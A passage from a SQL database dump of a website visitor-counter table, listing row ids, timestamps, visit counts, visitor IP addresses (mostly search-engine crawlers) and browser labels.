,0,0,'54.36.150.132','other'),(402263,1553094946,1,1,0,0,'46.229.168.138','other'),(402264,1553095162,1,1,0,0,'54.36.149.105','other'),(402265,1553095359,1,1,0,0,'91.196.178.81','firefox'),(402266,1553095624,1,1,0,0,'95.163.255.47','other'),(402267,1553095751,1,1,0,0,'54.36.148.46','other'),(402268,1553095764,1,1,0,0,'54.36.148.208','other'),(402269,1553095842,1,1,0,0,'95.163.255.46','other'),(402270,1553095998,1,1,0,0,'157.55.39.245','other'),(402271,1553096468,1,1,0,0,'54.36.150.31','other'),(402272,1553096558,1,1,0,0,'54.36.150.119','other'),(402273,1553096723,1,1,0,0,'46.229.168.151','other'),(402274,1553097536,1,1,0,0,'54.36.148.226','other'),(402275,1553097805,1,1,0,0,'173.232.242.34','chrome'),(402276,1553098464,1,1,0,0,'54.36.150.59','other'),(402277,1553098653,1,1,0,0,'54.36.150.108','other'),(402278,1553098874,1,1,0,0,'46.229.168.135','other'),(402279,1553098925,1,1,0,0,'46.229.168.133','other'),(402280,1553099137,1,1,0,0,'46.229.168.151','other'),(402281,1553099527,1,1,0,0,'54.36.149.42','other'),(402282,1553099550,1,1,0,0,'54.36.148.127','other'),(402283,1553099707,1,1,0,0,'46.229.168.138','other'),(402284,1553099797,1,1,0,0,'54.36.150.191','other'),(402285,1553099816,1,1,0,0,'40.77.167.111','other'),(402286,1553099951,1,1,0,0,'95.163.255.42','other'),(402287,1553100038,1,1,0,0,'46.229.168.143','other'),(402288,1553100563,1,1,0,0,'46.229.168.140','other'),(402289,1553100726,1,1,0,0,'46.229.168.137','other'),(402290,1553100805,2,2,0,0,'66.249.66.134','chrome'),(402291,1553100927,1,1,0,0,'54.36.150.172','other'),(402292,1553101067,1,1,0,0,'66.249.66.138','chrome'),(402293,1553101680,1,1,0,0,'5.45.207.79','other'),(402294,1553101728,3,3,0,0,'216.244.66.241','other'),(402295,1553101900,1,1,0,0,'178.154.244.11','other'),(402296,1553101935,1,1,0,0,'5.45.207.19','other'),(402297,1553101948,1,1,0,0,'46.229.168.143','other'),(402298,1553102074,1,1,0,0,'54.36.150.29','other'),(402299,1553102240,1,1,0,0,'87.250.224.47','other'),(402300,1553102335,1,1,0,0,'54.36.150.69','other'),(402301,1553102507,1,1,0,0,'54.36.150.191','other'),(402302,1553102598,1,0,1,0,'66.249.66.136',''),(402303,1553102611,1,1,0,0,'5.45.207.79','other'),(402304,1553102767,1,1,0,0,'54.36.149.8','other'),(402305,1553103405,1,1,0,0,'54.36.150.181','other'),(402306,1553103858,1,1,0,0,'54.36.150.36','other'),(402307,1553104351,1,1,0,0,'46.211.111.111','chrome'),(402308,1553104366,1,1,0,0,'54.36.148.48','other'),(402309,1553104577,1,1,0,0,'40.77.167.90','other'),(402310,1553104641,1,1,0,0,'54.36.150.40','other'),(402311,1553104678,1,1,0,0,'207.46.13.26','other'),(402312,1553105026,1,1,0,0,'8.29.198.26','other'),(402313,1553105100,1,0,1,0,'66.249.66.136',''),(402314,1553105141,1,1,0,0,'8.29.198.25','other'),(402315,1553105228,1,1,0,0,'54.36.149.32','other'),(402316,1553105370,1,1,0,0,'54.36.150.187','other'),(402317,1553105459,1,1,0,0,'54.36.148.42','other'),(402318,1553105529,1,1,0,0,'95.163.255.48','other'),(402319,1553105580,2,2,0,0,'66.249.66.134','chrome'),(402320,1553105689,1,1,0,0,'95.163.255.46','other'),(402321,1553105753,1,1,0,0,'66.249.66.58','chrome'),(402322,1553105862,1,1,0,0,'180.76.15.20','other'),(402323,1553106065,1,1,0,0,'54.36.148.156','other'),(402324,1553106248,1,1,0,0,'95.163.255.44','other'),(402325,1553106387,1,1,0,0,'66.249.66.60','chrome'),(402326,1553106528,1,1,0,0,'54.36.148.118','other'),(402327,1553106678,1,1,0,0,'207.46.13.70','other'),(402328,1553106962,1,1,0,0,'95.163.255.43','other'),(402329,1553106995,1,1,0,0,'157.55.39.57','other'),(402330,1553107329,1,1,0,0,'46.229.168.137','other'),(402331,1553107488,1,1,0,0,'5.196.87.174','other'),(402332,1553107599,1,1,0,0,'66.249.66.134','chrome'),(402333,1553107787,1,1,0,0,'46.229.168.149','other'),(402334,1553107947,1,1,0,0,'54.36.150.110','other'),(402335,1553108006,1,1,0,0,'54.36.148.209','other'),(402336,1553108234,1,0,1,0,'66.249.66.138',''),(402337,1553108634,1,1,0,0,'54.36.150.36','other'),(402338,1553108985,1,1,0,0,'54.36.149.1','other'),(402339,1553109128,1,1,0,0,'157.55.39.121','other'),(402340,1553109137,1,1,0,0,'66.249.66.58','chrome'),(402341,1553109215,1,1,0,0,'157.55.39.57','other'),(402342,1553109466,1,1,0,0,'46.229.168.141','other'),(402343,1553109518,1,1,0,0,'46.229.168.132','other'),(402344,1553109722,1,1,0,0,'54.36.149.38','other'),(402345,1553109863,1,0,1,0,'66.249.66.134',''),(402346,1553109866,1,1,0,0,'54.36.150.79','other'),(402347,1553110413,1,1,0,0,'54.36.150.144','other'),(402348,1553110436,1,1,0,0,'157.55.39.121','other'),(402349,1553110450,1,1,0,0,'46.229.168.154','other'),(402350,1553110596,1,1,0,0,'46.229.168.147','other'),(402351,1553110790,1,1,0,0,'46.229.168.151','other'),(402352,1553110874,1,1,0,0,'46.229.168.135','other'),(402353,1553111113,1,1,0,0,'66.249.66.134','chrome'),(402354,1553111329,1,1,0,0,'54.36.150.69','other'),(402355,1553111540,1,1,0,0,'54.36.148.90','other'),(402356,1553111788,1,1,0,0,'95.163.255.48','other'),(402357,1553112329,1,1,0,0,'95.163.255.49','other'),(402358,1553112574,1,1,0,0,'95.163.255.44','other'),(402359,1553112664,1,1,0,0,'66.249.66.134','chrome'),(402360,1553113189,1,1,0,0,'54.36.148.122','other'),(402361,1553113470,1,1,0,0,'66.249.66.138','chrome'),(402362,1553113730,1,1,0,0,'180.76.15.25','other'),(402363,1553113915,1,1,0,0,'66.249.66.62','chrome'),(402364,1553114078,1,1,0,0,'46.229.168.137','other'),(402365,1553114479,1,1,0,0,'54.36.150.190','other'),(402366,1553114487,1,1,0,0,'66.249.66.136','chrome'),(402367,1553114493,1,1,0,0,'66.249.66.134','chrome'),(402368,1553114880,1,1,0,0,'157.55.39.66','other'),(402369,1553115075,1,1,0,0,'216.244.66.241','other'),(402370,1553115488,2,2,0,0,'87.250.224.47','other'),(402371,1553115663,1,1,0,0,'141.8.142.103','other'),(402372,1553115895,1,1,0,0,'8.29.198.25','other'),(402373,1553115961,3,3,0,0,'66.249.66.134','chrome'),(402374,1553115999,1,1,0,0,'8.29.198.27','other'),(402375,1553116005,1,1,0,0,'54.36.148.175','other'),(402376,1553116060,1,1,0,0,'46.229.168.143','other'),(402377,1553116266,1,1,0,0,'66.249.66.136','chrome'),(402378,1553116388,1,1,0,0,'46.229.168.147','other'),(402379,1553116453,1,1,0,0,'178.154.244.11','other'),(402380,1553116841,1,1,0,0,'95.108.213.4','other'),(402381,1553116940,1,0,1,0,'66.249.66.138',''),(402382,1553117078,1,1,0,0,'54.36.150.33','other'),(402383,1553117121,1,1,0,0,'37.9.113.148','other'),(402384,1553117130,1,1,0,0,'54.36.150.50','other'),(402385,1553117146,2,2,0,0,'87.250.224.47','other'),(402386,1553117233,1,1,0,0,'54.36.148.13','other'),(402387,1553117254,1,1,0,0,'66.249.66.136','chrome'),(402388,1553117266,1,1,0,0,'54.36.150.3','other'),(402389,1553117339,3,3,0,0,'66.249.66.134','chrome'),(402390,1553117555,1,1,0,0,'178.154.244.11','other'),(402391,1553117882,1,1,0,0,'95.163.255.47','other'),(402392,1553117947,1,1,0,0,'54.36.150.4','other'),(402393,1553118016,1,1,0,0,'82.145.208.57','other'),(402394,1553118075,1,1,0,0,'95.163.255.46','other'),(402395,1553118247,1,1,0,0,'95.163.255.44','other'),(402396,1553118612,1,1,0,0,'46.229.168.134','other'),(402397,1553118746,1,1,0,0,'157.55.39.159','other'),(402398,1553118910,1,1,0,0,'46.229.168.150','other'),(402399,1553118944,1,1,0,0,'46.229.168.147','other'),(402400,1553119158,1,1,0,0,'40.77.167.217','other'),(402401,1553119180,1,1,0,0,'54.36.148.94','other'),(402402,1553119662,1,1,0,0,'166.78.144.9','firefox'),(402403,1553119748,1,1,0,0,'178.154.244.11','other'),(402404,1553120069,2,2,0,0,'66.249.66.136','chrome'),(402405,1553120149,1,1,0,0,'66.249.66.138','chrome'),(402406,1553120722,1,1,0,0,'54.36.149.38','other'),(402407,1553121162,1,1,0,0,'54.36.150.166','other'),(402408,1553121441,1,1,0,0,'54.36.148.81','other'),(402409,1553121682,1,1,0,0,'178.154.244.11','other'),(402410,1553122015,1,1,0,0,'46.229.168.134','other'),(402411,1553122434,1,1,0,0,'5.45.207.19','other'),(402412,1553122505,1,1,0,0,'95.163.255.48','other'),(402413,1553122512,1,1,0,0,'54.36.150.25','other'),(402414,1553122531,1,1,0,0,'54.36.148.90','other'),(402415,1553122746,1,1,0,0,'66.249.66.58','chrome'),(402416,1553123071,1,1,0,0,'46.229.168.138','other'),(402417,1553123079,1,1,0,0,'66.249.66.62','chrome'),(402418,1553123144,1,1,0,0,'66.249.66.138','chrome'),(402419,1553123250,1,1,0,0,'54.36.149.7','other'),(402420,1553123547,1,1,0,0,'5.196.87.171','other'),(402421,1553123618,1,1,0,0,'178.154.244.11','other'),(402422,1553123680,1,1,0,0,'54.36.148.78','other'),(402423,1553123858,1,1,0,0,'95.163.255.45','other'),(402424,1553123941,1,1,0,0,'40.77.167.120','other'),(402425,1553124119,1,1,0,0,'95.163.255.48','other'),(402426,1553124303,1,1,0,0,'5.196.87.173','other'),(402427,1553124345,1,1,0,0,'95.163.255.49','other'),(402428,1553124530,1,1,0,0,'5.188.210.51','chrome'),(402429,1553124601,1,1,0,0,'54.36.150.38','other'),(402430,1553124871,1,1,0,0,'46.229.168.133','other'),(402431,1553124985,1,1,0,0,'66.249.66.138','chrome'),(402432,1553125019,1,1,0,0,'54.36.149.91','other'),(402433,1553125954,1,1,0,0,'157.55.39.70','other'),(402434,1553126118,1,1,0,0,'66.249.66.134','chrome'),(402435,1553126220,1,1,0,0,'54.36.148.124','other'),(402436,1553126443,1,1,0,0,'66.249.66.58','chrome'),(402437,1553126537,1,1,0,0,'54.36.148.103','other'),(402438,1553126568,1,1,0,0,'66.249.66.138','chrome'),(402439,1553126743,1,1,0,0,'8.29.198.26','other'),(402440,1553126844,1,1,0,0,'8.29.198.25','other'),(402441,1553127037,1,1,0,0,'157.55.39.162','other'),(402442,1553127059,1,1,0,0,'66.249.66.134','chrome'),(402443,1553127145,1,1,0,0,'46.229.168.132','other'),(402444,1553127325,1,1,0,0,'54.36.148.213','other'),(402445,1553127514,1,1,0,0,'54.36.149.74','other'),(402446,1553127636,1,1,0,0,'54.36.148.193','other'),(402447,1553127811,1,1,0,0,'95.163.255.47','other'),(402448,1553127865,2,2,0,0,'46.229.168.148','other'),(402449,1553127914,1,1,0,0,'66.249.66.138','chrome'),(402450,1553128013,1,1,0,0,'46.229.168.149','other'),(402451,1553128360,1,1,0,0,'54.36.148.198','other'),(402452,1553128434,1,1,0,0,'95.163.255.45','other'),(402453,1553128651,1,1,0,0,'216.244.66.241','other'),(402454,1553128661,1,1,0,0,'95.163.255.49','other'),(402455,1553128837,1,1,0,0,'66.249.66.134','chrome'),(402456,1553128940,1,1,0,0,'66.249.66.58','chrome'),(402457,1553128994,1,1,0,0,'178.154.244.11','other'),(402458,1553129203,1,1,0,0,'54.36.149.43','other'),(402459,1553129465,1,1,0,0,'95.163.255.43','other'),(402460,1553129630,3,3,0,0,'66.249.66.136','chrome'),(402461,1553129723,1,1,0,0,'95.163.255.48','other'),(402462,1553129881,1,1,0,0,'95.163.255.46','other'),(402463,1553129978,1,1,0,0,'46.229.168.137','other'),(402464,1553130247,1,1,0,0,'54.36.150.31','other'),(402465,1553130567,1,1,0,0,'95.108.213.4','other'),(402466,1553130770,1,1,0,0,'66.249.66.136','chrome'),(402467,1553130912,1,1,0,0,'54.36.150.47','other'),(402468,1553130921,1,1,0,0,'66.249.66.134','chrome'),(402469,1553131096,1,1,0,0,'46.211.133.7','chrome'),(402470,1553131254,1,1,0,0,'216.244.66.241','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (402471,1553131359,1,1,0,0,'66.249.66.138','chrome'),(402472,1553131456,1,1,0,0,'46.229.168.142','other'),(402473,1553131676,1,1,0,0,'54.36.149.82','other'),(402474,1553131732,1,1,0,0,'46.229.168.147','other'),(402475,1553132351,4,4,0,0,'95.163.255.45','other'),(402476,1553132516,3,3,0,0,'95.163.255.48','other'),(402477,1553132789,1,1,0,0,'95.163.255.44','other'),(402478,1553133073,1,1,0,0,'46.229.168.146','other'),(402479,1553133148,2,2,0,0,'95.163.255.47','other'),(402480,1553133346,1,1,0,0,'95.163.255.46','other'),(402481,1553133451,1,1,0,0,'157.55.39.70','other'),(402482,1553133597,1,1,0,0,'216.244.66.241','other'),(402483,1553133960,1,1,0,0,'54.36.148.129','other'),(402484,1553134157,1,1,0,0,'66.249.66.136','chrome'),(402485,1553134323,1,1,0,0,'54.36.150.43','other'),(402486,1553134417,1,1,0,0,'54.36.148.60','other'),(402487,1553134433,1,1,0,0,'54.36.148.17','other'),(402488,1553134448,1,1,0,0,'46.229.168.132','other'),(402489,1553134707,1,1,0,0,'54.36.150.121','other'),(402490,1553134861,1,1,0,0,'173.232.242.34','chrome'),(402491,1553135643,1,1,0,0,'109.74.154.72','chrome'),(402492,1553135717,1,1,0,0,'54.36.150.67','other'),(402493,1553135879,1,1,0,0,'52.53.201.78','chrome'),(402494,1553136092,1,1,0,0,'46.229.168.147','other'),(402495,1553136338,1,1,0,0,'54.36.148.97','other'),(402496,1553136339,2,2,0,0,'66.249.66.138','chrome'),(402497,1553136399,1,1,0,0,'54.36.150.31','other'),(402498,1553136417,1,1,0,0,'54.36.148.85','other'),(402499,1553136433,1,1,0,0,'54.36.148.93','other'),(402500,1553136493,1,1,0,0,'40.77.167.217','other'),(402501,1553136513,1,1,0,0,'66.249.66.62','chrome'),(402502,1553136575,1,1,0,0,'54.36.150.139','other'),(402503,1553136871,1,1,0,0,'46.229.168.133','other'),(402504,1553137074,2,2,0,0,'34.211.114.229','chrome'),(402505,1553137556,1,1,0,0,'54.36.148.82','other'),(402506,1553137602,1,1,0,0,'8.29.198.25','other'),(402507,1553137689,1,1,0,0,'8.29.198.27','other'),(402508,1553137917,1,1,0,0,'66.249.66.58','chrome'),(402509,1553138086,1,1,0,0,'95.163.255.43','other'),(402510,1553138165,1,1,0,0,'95.163.255.42','other'),(402511,1553138293,1,1,0,0,'95.163.255.45','other'),(402512,1553138412,1,1,0,0,'95.163.255.48','other'),(402513,1553138428,1,1,0,0,'40.77.167.120','other'),(402514,1553138629,1,1,0,0,'46.229.168.136','other'),(402515,1553138720,1,1,0,0,'54.36.148.80','other'),(402516,1553139186,1,1,0,0,'54.36.148.33','other'),(402517,1553139511,1,1,0,0,'40.77.167.120','other'),(402518,1553139682,1,1,0,0,'180.76.15.31','other'),(402519,1553139686,1,1,0,0,'66.249.66.134','chrome'),(402520,1553139886,1,1,0,0,'66.249.66.136','chrome'),(402521,1553140005,1,1,0,0,'54.36.150.86','other'),(402522,1553140033,2,2,0,0,'66.249.66.138','chrome'),(402523,1553140147,1,1,0,0,'54.36.148.191','other'),(402524,1553140412,1,1,0,0,'54.36.150.108','other'),(402525,1553140633,1,1,0,0,'54.36.148.244','other'),(402526,1553141242,1,1,0,0,'54.36.148.14','other'),(402527,1553141398,1,1,0,0,'66.249.66.136','chrome'),(402528,1553141437,1,1,0,0,'54.36.148.126','other'),(402529,1553141502,2,2,0,0,'213.180.203.17','other'),(402530,1553141581,1,1,0,0,'141.8.183.22','other'),(402531,1553141609,1,1,0,0,'87.250.224.118','other'),(402532,1553141750,1,1,0,0,'40.77.167.43','other'),(402533,1553141902,1,1,0,0,'54.36.148.27','other'),(402534,1553142006,2,2,0,0,'95.108.213.4','other'),(402535,1553142048,1,1,0,0,'141.8.142.103','other'),(402536,1553142070,1,1,0,0,'54.36.148.49','other'),(402537,1553142188,1,1,0,0,'213.180.203.9','other'),(402538,1553142504,1,1,0,0,'46.229.168.147','other'),(402539,1553142599,1,1,0,0,'66.249.66.134','chrome'),(402540,1553142639,1,1,0,0,'95.108.181.54','other'),(402541,1553142671,1,1,0,0,'54.36.150.81','other'),(402542,1553142760,1,1,0,0,'157.55.39.208','other'),(402543,1553142855,1,1,0,0,'213.180.203.40','other'),(402544,1553142914,1,1,0,0,'5.45.207.19','other'),(402545,1553142941,1,1,0,0,'178.154.244.11','other'),(402546,1553143267,1,1,0,0,'54.36.150.129','other'),(402547,1553143283,1,1,0,0,'54.36.149.102','other'),(402548,1553143749,1,1,0,0,'66.249.66.138','chrome'),(402549,1553143859,1,1,0,0,'95.163.255.44','other'),(402550,1553143862,1,1,0,0,'66.249.66.136','chrome'),(402551,1553143947,1,1,0,0,'95.163.255.49','other'),(402552,1553144033,1,1,0,0,'95.163.255.48','other'),(402554,1553144051,1,1,0,0,'54.36.148.197','other'),(402555,1553144089,1,1,0,0,'46.229.168.129','other'),(402556,1553144111,1,1,0,0,'95.163.255.46','other'),(402557,1553144503,1,1,0,0,'40.77.167.162','other'),(402558,1553144534,1,1,0,0,'46.229.168.135','other'),(402559,1553144623,1,1,0,0,'46.229.168.134','other'),(402560,1553144670,1,1,0,0,'54.36.148.52','other'),(402561,1553144804,1,1,0,0,'54.36.148.138','other'),(402562,1553145069,1,1,0,0,'54.36.150.120','other'),(402563,1553145081,1,1,0,0,'46.229.168.143','other'),(402564,1553145087,1,1,0,0,'54.36.149.93','other'),(402565,1553145119,1,1,0,0,'40.77.167.43','other'),(402566,1553145265,1,1,0,0,'37.145.56.99','chrome'),(402567,1553145434,1,1,0,0,'95.163.255.43','other'),(402568,1553145501,1,1,0,0,'54.36.148.64','other'),(402569,1553146109,1,1,0,0,'54.36.150.184','other'),(402570,1553146119,1,1,0,0,'91.196.178.135','firefox'),(402571,1553146133,1,1,0,0,'42.236.10.78','chrome'),(402572,1553146201,1,1,0,0,'180.163.220.66','other'),(402573,1553146231,1,1,0,0,'180.163.220.3','other'),(402574,1553146371,1,1,0,0,'178.171.62.143','chrome'),(402575,1553146525,1,1,0,0,'66.249.66.136','chrome'),(402576,1553146536,2,2,0,0,'95.163.255.46','other'),(402577,1553146546,1,1,0,0,'46.229.168.138','other'),(402578,1553146921,1,1,0,0,'54.36.150.103','other'),(402579,1553147025,1,1,0,0,'54.36.149.99','other'),(402580,1553147406,2,2,0,0,'66.249.66.138','chrome'),(402581,1553147752,1,1,0,0,'46.229.168.140','other'),(402582,1553148106,1,1,0,0,'54.36.150.84','other'),(402583,1553148281,1,1,0,0,'66.249.66.136','chrome'),(402584,1553148458,1,1,0,0,'8.29.198.25','other'),(402585,1553148526,1,1,0,0,'8.29.198.27','other'),(402586,1553148665,1,1,0,0,'66.249.66.62','chrome'),(402587,1553148775,1,1,0,0,'54.36.148.24','other'),(402588,1553149144,1,1,0,0,'54.36.148.198','other'),(402589,1553149166,1,1,0,0,'216.244.66.241','other'),(402590,1553149220,1,1,0,0,'40.77.167.120','other'),(402591,1553149282,1,1,0,0,'66.249.66.134','chrome'),(402592,1553149345,1,1,0,0,'54.36.148.50','other'),(402593,1553149500,2,2,0,0,'95.163.255.42','other'),(402594,1553149697,1,1,0,0,'157.55.39.208','other'),(402595,1553149706,2,2,0,0,'95.163.255.44','other'),(402596,1553149788,1,1,0,0,'95.163.255.46','other'),(402597,1553149872,1,1,0,0,'54.36.149.93','other'),(402598,1553149879,1,1,0,0,'95.163.255.45','other'),(402599,1553149908,1,1,0,0,'87.120.36.157','other'),(402600,1553150002,1,1,0,0,'95.163.255.47','other'),(402601,1553150061,1,1,0,0,'54.36.148.182','other'),(402602,1553150110,1,1,0,0,'95.163.255.48','other'),(402603,1553150264,1,1,0,0,'46.229.168.153','other'),(402604,1553150553,2,2,0,0,'66.249.66.138','chrome'),(402605,1553150977,1,1,0,0,'54.36.148.110','other'),(402606,1553150978,1,1,0,0,'40.77.167.120','other'),(402607,1553151152,1,1,0,0,'87.250.224.81','other'),(402608,1553151156,1,1,0,0,'178.154.244.65','other'),(402609,1553151231,1,1,0,0,'37.9.113.103','other'),(402610,1553151238,1,1,0,0,'54.36.148.172','other'),(402611,1553151244,1,1,0,0,'54.36.150.132','other'),(402612,1553151257,1,1,0,0,'95.108.181.54','other'),(402613,1553151407,1,1,0,0,'213.180.203.9','other'),(402614,1553151458,1,1,0,0,'178.154.171.27','other'),(402615,1553151488,1,1,0,0,'5.45.207.19','other'),(402616,1553151541,1,1,0,0,'54.36.150.85','other'),(402617,1553151666,1,1,0,0,'66.249.66.134','chrome'),(402618,1553151720,1,1,0,0,'54.36.148.63','other'),(402619,1553151732,1,1,0,0,'213.180.203.40','other'),(402620,1553151739,1,1,0,0,'66.249.66.138','chrome'),(402621,1553151948,1,1,0,0,'178.154.244.11','other'),(402622,1553151951,1,1,0,0,'66.249.66.60','chrome'),(402623,1553151972,1,1,0,0,'95.163.255.42','other'),(402624,1553152043,1,1,0,0,'46.229.168.147','other'),(402625,1553152052,1,1,0,0,'54.36.150.62','other'),(402626,1553152229,1,1,0,0,'54.36.149.23','other'),(402627,1553152307,1,1,0,0,'91.211.135.230','chrome'),(402628,1553152357,1,1,0,0,'109.173.40.29','msie'),(402629,1553152366,1,1,0,0,'91.124.182.170','firefox'),(402630,1553153320,3,3,0,0,'91.196.178.93','chrome'),(402631,1553153387,1,1,0,0,'54.36.148.71','other'),(402632,1553153415,2,2,0,0,'66.249.66.134','chrome'),(402633,1553153495,1,1,0,0,'87.250.224.47','other'),(402634,1553153740,1,1,0,0,'46.229.168.152','other'),(402635,1553153775,1,1,0,0,'78.111.187.209','firefox'),(402637,1553153916,1,1,0,0,'5.45.207.19','other'),(402638,1553154416,2,2,0,0,'66.249.66.134','chrome'),(402639,1553154490,1,1,0,0,'46.229.168.143','other'),(402640,1553154936,5,5,0,0,'95.163.255.47','other'),(402641,1553155210,2,2,0,0,'95.163.255.44','other'),(402642,1553155316,1,1,0,0,'54.36.149.40','other'),(402643,1553155582,1,1,0,0,'66.249.66.138','chrome'),(402644,1553155840,2,2,0,0,'95.163.255.43','other'),(402645,1553155956,1,1,0,0,'54.36.148.51','other'),(402646,1553155987,1,1,0,0,'95.163.255.46','other'),(402647,1553156080,1,1,0,0,'54.36.149.97','other'),(402648,1553156145,1,1,0,0,'95.163.255.49','other'),(402649,1553156243,1,1,0,0,'95.163.255.42','other'),(402650,1553156250,2,2,0,0,'66.249.66.136','chrome'),(402651,1553156282,1,1,0,0,'54.36.150.187','other'),(402652,1553156416,1,1,0,0,'54.36.150.125','other'),(402653,1553156454,1,1,0,0,'46.229.168.133','other'),(402654,1553156582,1,1,0,0,'66.249.66.134','chrome'),(402655,1553156733,1,1,0,0,'91.196.178.93','chrome'),(402656,1553157039,1,1,0,0,'66.249.66.138','chrome'),(402657,1553157098,1,1,0,0,'95.163.255.44','other'),(402658,1553157253,1,1,0,0,'95.163.255.45','other'),(402659,1553157482,1,1,0,0,'54.36.150.144','other'),(402660,1553157541,1,1,0,0,'54.36.148.172','other'),(402661,1553157574,1,1,0,0,'216.244.66.241','other'),(402662,1553157973,2,2,0,0,'66.249.66.138','chrome'),(402663,1553158179,1,1,0,0,'46.229.168.138','other'),(402664,1553158254,1,1,0,0,'54.36.149.2','other'),(402665,1553158369,1,1,0,0,'46.229.168.136','other'),(402666,1553158629,2,2,0,0,'40.77.167.62','other'),(402667,1553158850,1,1,0,0,'46.229.168.135','other'),(402668,1553158896,1,1,0,0,'46.229.168.151','other'),(402669,1553158938,1,1,0,0,'54.36.149.85','other'),(402671,1553158998,1,1,0,0,'178.154.244.11','other'),(402672,1553159007,1,1,0,0,'5.45.207.19','other'),(402673,1553159075,1,1,0,0,'37.9.113.103','other'),(402674,1553159295,1,1,0,0,'54.36.148.58','other'),(402675,1553159303,2,2,0,0,'8.29.198.25','other'),(402676,1553159444,1,1,0,0,'66.249.66.136','chrome'),(402677,1553159451,1,1,0,0,'66.249.66.134','chrome'),(402678,1553159453,1,1,0,0,'54.36.148.200','other'),(402679,1553159522,1,1,0,0,'78.111.187.209','firefox'),(402680,1553159596,1,1,0,0,'213.180.203.40','other'),(402681,1553159702,1,1,0,0,'46.229.168.129','other'),(402682,1553159728,2,2,0,0,'91.196.178.93','chrome'),(402683,1553159811,1,1,0,0,'31.31.20.55','chrome'),(402684,1553159901,1,1,0,0,'54.36.148.180','other'),(402685,1553160226,1,1,0,0,'40.77.167.122','other'),(402686,1553160328,1,1,0,0,'54.36.150.134','other'),(402687,1553160346,3,3,0,0,'78.111.187.184','firefox'),(402688,1553160461,1,1,0,0,'54.36.149.53','other'),(402689,1553160551,1,1,0,0,'54.36.148.170','other'),(402690,1553160617,1,1,0,0,'66.249.66.134','chrome'),(402691,1553160695,1,1,0,0,'66.249.66.138','chrome'),(402692,1553160828,3,3,0,0,'95.163.255.43','other'),(402693,1553161147,1,1,0,0,'95.163.255.48','other'),(402694,1553161170,1,1,0,0,'54.36.149.75','other'),(402695,1553161325,1,1,0,0,'95.163.255.44','other'),(402696,1553161458,1,1,0,0,'95.163.255.46','other'),(402697,1553161517,1,1,0,0,'95.163.255.47','other'),(402698,1553161553,1,1,0,0,'54.36.150.157','other'),(402699,1553161655,1,1,0,0,'37.55.226.148','chrome'),(402700,1553161795,1,1,0,0,'54.36.149.102','other'),(402701,1553161860,1,1,0,0,'91.196.179.33','firefox'),(402702,1553161878,1,1,0,0,'185.138.228.107','chrome'),(402703,1553161984,1,0,1,0,'66.249.66.138',''),(402704,1553162209,1,1,0,0,'54.36.148.105','other'),(402705,1553162456,1,1,0,0,'54.36.150.129','other'),(402706,1553162645,1,1,0,0,'54.36.148.112','other'),(402707,1553162901,1,1,0,0,'54.36.148.122','other'),(402708,1553162955,1,1,0,0,'46.229.168.130','other'),(402709,1553163480,1,1,0,0,'54.36.148.105','other'),(402710,1553163761,1,1,0,0,'54.36.150.153','other'),(402711,1553163838,2,2,0,0,'207.46.13.58','other'),(402712,1553164442,1,1,0,0,'91.196.177.110','chrome'),(402713,1553164501,1,1,0,0,'54.36.148.204','other'),(402714,1553164706,1,1,0,0,'54.36.150.110','other'),(402715,1553164897,1,1,0,0,'66.249.66.134','chrome'),(402716,1553165261,1,1,0,0,'213.180.203.40','other'),(402717,1553165296,1,1,0,0,'216.244.66.241','other'),(402718,1553165318,1,1,0,0,'178.154.244.65','other'),(402719,1553165388,3,3,0,0,'178.154.244.49','other'),(402720,1553165581,1,1,0,0,'141.8.142.108','other'),(402721,1553165722,1,1,0,0,'37.9.113.148','other'),(402722,1553165769,1,1,0,0,'37.9.113.20','other'),(402723,1553165821,1,1,0,0,'141.8.132.16','other'),(402724,1553165849,1,1,0,0,'37.54.189.252','chrome'),(402725,1553165976,1,1,0,0,'180.163.220.66','chrome'),(402726,1553166009,1,1,0,0,'37.9.113.38','other'),(402727,1553166020,1,1,0,0,'178.154.244.11','other'),(402728,1553166082,1,1,0,0,'54.36.150.153','other'),(402729,1553166183,3,3,0,0,'95.163.255.46','other'),(402730,1553166262,1,1,0,0,'66.249.66.138','chrome'),(402731,1553166287,1,1,0,0,'95.163.255.49','other'),(402732,1553166542,1,1,0,0,'54.36.148.57','other'),(402733,1553166624,1,1,0,0,'95.163.255.43','other'),(402734,1553166723,1,1,0,0,'54.36.148.137','other'),(402735,1553166754,1,1,0,0,'91.196.177.110','chrome'),(402736,1553166773,1,1,0,0,'46.229.168.144','other'),(402737,1553166880,1,1,0,0,'46.229.168.148','other'),(402738,1553167263,1,1,0,0,'54.36.150.160','other'),(402739,1553167330,1,1,0,0,'54.36.149.12','other'),(402740,1553167534,1,1,0,0,'54.36.148.67','other'),(402741,1553167832,1,1,0,0,'46.229.168.151','other'),(402742,1553167854,1,1,0,0,'46.229.168.146','other'),(402743,1553168180,2,2,0,0,'46.229.168.130','other'),(402744,1553168218,1,1,0,0,'91.196.178.186','chrome'),(402745,1553168451,1,1,0,0,'46.229.168.136','other'),(402746,1553169439,1,1,0,0,'54.36.148.192','other'),(402747,1553169758,1,1,0,0,'54.36.150.74','other'),(402748,1553170037,1,1,0,0,'91.196.178.186','chrome'),(402749,1553170154,2,2,0,0,'8.29.198.26','other'),(402750,1553170322,1,1,0,0,'54.36.150.83','other'),(402751,1553170393,2,2,0,0,'207.46.13.58','other'),(402752,1553170417,1,1,0,0,'54.36.148.233','other'),(402753,1553170962,1,1,0,0,'46.229.168.137','other'),(402754,1553171105,1,1,0,0,'54.36.149.41','other'),(402755,1553171377,2,2,0,0,'91.196.178.93','chrome'),(402756,1553171598,1,1,0,0,'54.36.150.158','other'),(402757,1553171779,1,1,0,0,'54.36.149.99','other'),(402758,1553171829,1,1,0,0,'54.36.149.25','other'),(402759,1553171951,1,1,0,0,'54.36.148.143','other'),(402760,1553172074,1,1,0,0,'95.163.255.42','other'),(402761,1553172138,1,1,0,0,'66.249.66.62','chrome'),(402762,1553172185,1,1,0,0,'95.163.255.45','other'),(402763,1553172276,1,1,0,0,'95.163.255.47','other'),(402764,1553172471,1,1,0,0,'54.36.148.214','other'),(402765,1553172517,1,1,0,0,'46.229.168.146','other'),(402766,1553172597,1,1,0,0,'192.162.233.33','chrome'),(402767,1553172841,1,1,0,0,'216.244.66.241','other'),(402768,1553173410,1,1,0,0,'54.36.148.50','other'),(402769,1553173416,1,1,0,0,'92.113.72.117','chrome'),(402770,1553173441,1,1,0,0,'54.36.150.40','other'),(402771,1553173445,1,1,0,0,'91.124.182.170','firefox'),(402772,1553173554,1,1,0,0,'54.36.148.40','other'),(402773,1553173598,1,1,0,0,'54.36.149.21','other'),(402774,1553173840,1,1,0,0,'54.